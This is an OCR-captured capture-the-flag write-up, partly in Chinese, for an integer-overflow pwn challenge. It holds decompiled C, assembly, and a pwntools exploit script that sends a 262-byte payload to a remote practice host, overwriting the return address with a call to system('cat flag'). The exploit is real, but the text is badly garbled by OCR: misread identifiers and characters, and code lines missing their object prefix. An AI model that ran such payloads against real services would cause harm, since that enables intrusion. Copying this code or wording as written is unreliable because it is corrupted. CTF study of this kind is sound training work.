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printf("Hello ¥s\n", &s);
puts("Please input your passwd:");

read(@, &buf, 8x199u); -
return check_passwd(&but) ;’--_—_
BRATBEAN XA check_passwd & % :

3 = strlen(s);
if (w3 <= 3u || v3 > Bu )

puts("Invalid Password™);
~esult = (char *)fflush(stdout);

puts("Success™);
fflush(stdout);
~esult = strepy(&dest, s);

2 v3>3uH v3<8ult, RAIAILAFEAN T HKelsed .
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push [ebp+s] ; s

call _strlen

add esp, 18h

mov [ebpt+var_9], al

cmp [ebptvar_9], 3 \
jbe short loc_88486FC

cmp [ebptvar_9], 8

ja short loc_88486FC

sub esp, BCh

push offset s ; "Success”
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return system(“"cat flag");

RAXEEF—/catflag, B BXANHhk el AR B RATEZE K)flag T !
T TH 2 5 exp:

#! /usr/bin/env python
[from pwn import *
p=remote('111.198.29.45",33613)
sys_addr=0x0804868B
payload="'a"'*24+p32(sys_addr)
payload=payload.ljust(262,'a")

.recvuntil("Your choice:")

.sendline("1")

.recvuntil("Please input your username:\n")

.recvuntil("Please input your passwd:\n")
.sendline(payload)
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p.sendline("aaaa")
p
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.interactive()



	攻防世界pwn int_overflow writeup
	这是一道整数溢出题
	当v3>3u且v3<8u时，我们可以进入下面的else中。
	我们知道，八位寄存器对于无符号整数来说是有0~255的范围的


